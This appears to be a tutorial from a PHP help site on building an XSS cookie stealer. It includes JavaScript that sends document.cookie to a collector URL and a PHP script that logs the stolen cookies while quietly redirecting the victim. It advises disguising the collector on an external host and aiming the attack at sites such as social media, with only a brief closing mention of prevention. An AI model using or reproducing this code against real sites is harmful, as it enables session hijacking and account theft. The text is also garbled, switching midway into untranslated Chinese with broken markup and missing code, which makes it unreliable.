Detailed explanation of how to write XSS cookie stealer in JS to steal passwords

This article mainly introduces the detailed steps of writing XSS cookie stealer in JS to steal passwords. Friends who need it can refer to it. I hope it can help everyone. JavaScript is the most commonly used script development language in the web. JS can automatically execute site components, manage site content, and implement other useful functions in the web industry. JS can have many functions that can be used for malicious purposes, including stealing user cookies containing passwords and other content.

Cookies are information that a site requests and maintains for a specific visited page. Cookies contain authentication information such as access method, time, username and password, etc. When a user visits a given site, a cookie must be used; if an attacker can intercept the cookie, the cookie can be used to steal some of the user's information. For a specific domain name, JS can be used to save or modify the user's cookie. In other words, if an attacker can use JS to view and modify cookies, then this can become a valuable hacking technique.

JS-based attacks can be effectively combined with techniques such as code injection, which may cause malicious code to be executed on trusted websites.

Start creating the XSS cookie stealer

Step 1: Create an HTML Test page

First , create a standard HTML page

mkdir cookiestealer
cd cookiestealer
touch index.html

Then, edit index.html

nano index.html
<html>
<body>
</body>
</html>

Test page

Step 2: Create Cookie

Create a basic parameter that can be inserted into the cookie—— string. This cookie can only be used on this page. Likewise, subsequent injections will also apply to all cookies saved on this page.

 <script type="text/javascript">document.cookie = "username=Null Byte";</script>

This script should be inserted into the

part of HTML, as follows:

##If you run this script When the page is opened, the cookie will be set, but nothing will be displayed in the browser. We can view the cookie directly using the document.write function.

document.write(document.cookie);

The script with the same function is as follows:

 <script type="text/javascript">
 document.cookie = "username=Null Byte";
 document.write(document.cookie);
 </script>

In the browser When you open the page, the following cookie information will appear:

It means that we successfully set the cookie of "

username=Null Byte" for this page. .

Step 3: Use js script to steal Cookies

The js string we use to pass cookies to the server uses the document.cookie parameter, but we use document The url defined in .location.

document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;

In this example, the PHP file is located on localhost (127.0.0.1).

If the target is a social media website, the script needs to be injected into the site and the stolen cookies sent to an IP or URL controlled by the hacker.

Put the js code into the <script> tag: <p><p class="jb51code">##<pre class='brush:php;toolbar:false;'><script type="text/javascript"> document.location=&amp;#39;http://127.0.0.1/cookiestealer.php?c=&amp;#39;+document.cookie; </script>
The HTML page code should be as follows:

The remaining part of cookie processing needs to be handled by PHP.

Step 4: Process Cookies with PHP

In the above example, the PHP file that steals cookies is cookiestealer.php, located under the 127.0.0.1 URL.

In actual operation, you cannot use an obvious name like cookiestealer.php, and it should be located under an external IP or URL.

First, create the PHP file in the same directory as index.html.

nano cookiestealer.php

The first element that needs to be defined is the redirect page jump.

<?php
header (&#39;Location:https://google.com&#39;);
?>

In order to prevent users from being aware of a possible attack, it is best to redirect users to other pages under the same domain so that users are not aware of it.

After the redirect is complete, additional code is needed to handle the cookies. 1. Assign cookie to a variable;

$cookies = $_GET"c";

2. Define saving cookie file, the location where this file is saved should be under our control.

In this example, the file name is log.txt.

 $file = fopen('log.txt', 'a');

3. Write the contents of the above two parameters to the log file, that is, write the cookie to log.txt.

fwrite($file, $cookies . "nn");

The code is as follows:

然后，需要准备PHP文件的测试环境。

Step 5: 测试Cookie Stealer

在index.html 和 cookiestealer.php相同目录下，搭建一个测试用的PHP环境。

php -S 127.0.0.1:80

页面测试成功。

打开页面之后，浏览器会马上重定向到预定义的网站，即Google。

查看PHP服务器的日志，我们注意到传递给php文件一个参数，而且php代码执行了。

最后，我们可以检查我们网站目录下的log.txt文件来查看cookies。

cat log.txt

Log文件中含有cookie的内容，说明我们成功的使用js代码窃取了cookies。

Step 6: 攻击

Cookies含有重要的用户信息，一般是明文的，有时甚至含有私钥信息。所以非常重要，使用js代码注入可以窃取用户的cookies信息。

该攻击可以注入到任何的HTML文件的<script>标签中。常用的检测XSS的方法是使用alert。<p class="jb51code"><br/><pre class='brush:php;toolbar:false;'>&lt;script&gt;alert(&quot;Alert&quot;);&lt;/script&gt;</pre><p>该脚本会尝试打开类似下面的alert信息。如果打开了，说明网站易受到xss攻击。<p style="max-width:90%"><img src="/static/imghwm/default1.png" data-src="https://img.php.cn/upload/article/000/054/025/ea4f674ed0ae4322a4900b631ba51b83-13.jpg?x-oss-process=image/resize,p_40" class="lazy" alt=""/><p>在现实的攻击中，黑客会特别注意PHP文件的位置。如果处理得不好，php文件会容易暴露黑客的位置。如果这种攻击出现了，那么根据cookie被发送和保存的位置，可以追踪黑客。<p>上面的方法说明了JS作为攻击工具的强大性。JS可以让web更方便 ，如果某个网站易受到恶意JS注入，这会给用户和网站带来巨大的安全威胁。预防XSS攻击的重担落在了web开发者的身上。如果用户认为运行在网站上的脚本是不可信的，也可以使用NoScript来阻止js代码的运行。<p>相关推荐：<p><a href="http://www.php.cn/php-weizijiaocheng-373876.html" target="_self">php利用httponly防xss攻击<p><a href="http://www.php.cn/php-weizijiaocheng-366191.html" target="_self">推荐10款防XSS特效（收藏）<p><a href="http://www.php.cn/weixin-kaifa-364736.html" target="_self">关于wxss的10篇文章推荐</script>

The above is the detailed content of Detailed explanation of how to write XSS cookie stealer in JS to steal passwords. For more information, please follow other related articles on the PHP Chinese website!